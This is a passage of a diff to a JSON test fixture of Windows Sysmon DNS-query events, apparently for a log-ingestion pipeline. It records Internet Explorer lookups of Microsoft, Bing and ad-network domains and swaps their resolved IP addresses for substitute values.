Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025330400Z'/\u003e\u003cEventRecordID\u003e72\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c.msn.com.nsatc.net;::ffff:20.36.253.92;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025330400Z'/\u003e\u003cEventRecordID\u003e72\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.msn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c.msn.com.nsatc.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -468,7 +468,7 @@ "ProcessId": "2736", "QueryName": "c.msn.com", "QueryStatus": "0", - "QueryResults": "type: 5 c.msn.com.nsatc.net;::ffff:20.36.253.92;" + "QueryResults": "type: 5 c.msn.com.nsatc.net;::ffff:89.160.20.156;" } } }, @@ -483,7 +483,7 @@ "ProcessId": "2736", "QueryName": "c.bing.com", "QueryStatus": "0", - "QueryResults": "type: 5 c-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:13.107.21.200;::ffff:204.79.197.200;", + "QueryResults": "type: 5 c-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:01.948", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -505,7 +505,7 @@ } }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025347300Z'/\u003e\u003cEventRecordID\u003e73\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.948\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:13.107.21.200;::ffff:204.79.197.200;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:02.025347300Z'/\u003e\u003cEventRecordID\u003e73\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:01.948\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.bing.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 c-bing-com.a-0001.a-msedge.net;type: 5 dual-a-0001.a-msedge.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -515,7 +515,7 @@ "@timestamp": "2021-05-05T15:30:51.694Z", "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028190100Z'/\u003e\u003cEventRecordID\u003e74\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.085\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econtextual.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028190100Z'/\u003e\u003cEventRecordID\u003e74\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.085\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003econtextual.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -525,7 +525,7 @@ "level": "information", "event_data": { "QueryStatus": "0", - "QueryResults": "::ffff:23.52.167.93;", + "QueryResults": "::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.085", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -554,7 +554,7 @@ "@timestamp": "2021-05-05T15:30:51.694Z", "event": { "kind": "event", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028274700Z'/\u003e\u003cEventRecordID\u003e75\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.174\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eat.atwola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 glb-ads.atwola.adtechus.com;type: 5 cs670.wac.thetacdn.net;type: 5 cs670.lb.wac.apr-1b09e.edgecastdns.net;type: 5 cs935.wac.thetacdn.net;::ffff:152.195.32.120;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028274700Z'/\u003e\u003cEventRecordID\u003e75\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.174\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eat.atwola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 glb-ads.atwola.adtechus.com;type: 5 cs670.wac.thetacdn.net;type: 5 cs670.lb.wac.apr-1b09e.edgecastdns.net;type: 5 cs935.wac.thetacdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22" }, @@ -571,7 +571,7 @@ "ProcessId": "2736", "QueryName": "at.atwola.com", "QueryStatus": "0", - "QueryResults": "type: 5 glb-ads.atwola.adtechus.com;type: 5 cs670.wac.thetacdn.net;type: 5 cs670.lb.wac.apr-1b09e.edgecastdns.net;type: 5 cs935.wac.thetacdn.net;::ffff:152.195.32.120;", + "QueryResults": "type: 5 glb-ads.atwola.adtechus.com;type: 5 cs670.wac.thetacdn.net;type: 5 cs670.lb.wac.apr-1b09e.edgecastdns.net;type: 5 cs935.wac.thetacdn.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "computer_name": "vagrant-2016", @@ -592,7 +592,7 @@ { "@timestamp": "2021-05-05T15:30:51.694Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028358900Z'/\u003e\u003cEventRecordID\u003e76\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003em.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 microsoft.geo.appnexusgslb.net;type: 5 m.anycast.adnxs.com;::ffff:204.13.192.56;::ffff:204.13.192.120;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028358900Z'/\u003e\u003cEventRecordID\u003e76\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.274\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003em.adnxs.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 microsoft.geo.appnexusgslb.net;type: 5 m.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -616,7 +616,7 @@ } }, "event_data": { - "QueryResults": "type: 5 microsoft.geo.appnexusgslb.net;type: 5 m.anycast.adnxs.com;::ffff:204.13.192.56;::ffff:204.13.192.120;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;", + "QueryResults": "type: 5 microsoft.geo.appnexusgslb.net;type: 5 m.anycast.adnxs.com;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.274", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -631,7 +631,7 @@ { "@timestamp": "2021-05-05T15:30:51.694Z", "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028412800Z'/\u003e\u003cEventRecordID\u003e77\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.291\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecms.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 spcms-global.pbp.gysm.yahoodns.net;::ffff:74.6.137.78;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028412800Z'/\u003e\u003cEventRecordID\u003e77\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.291\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecms.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 spcms-global.pbp.gysm.yahoodns.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -652,7 +652,7 @@ "event_data": { "QueryName": "cms.analytics.yahoo.com", "QueryStatus": "0", - "QueryResults": "type: 5 spcms-global.pbp.gysm.yahoodns.net;::ffff:74.6.137.78;", + "QueryResults": "type: 5 spcms-global.pbp.gysm.yahoodns.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.291", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -671,7 +671,7 @@ "@timestamp": "2021-05-05T15:30:51.694Z", "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028501000Z'/\u003e\u003cEventRecordID\u003e78\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.413\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecvision.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cvision.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.028501000Z'/\u003e\u003cEventRecordID\u003e78\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:02.413\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecvision.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cvision.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -681,7 +681,7 @@ "time_created": "2019-07-18T03:34:03.028Z", "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 cvision.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:23.52.167.93;", + "QueryResults": "type: 5 cvision.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:02.413", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -709,7 +709,7 @@ 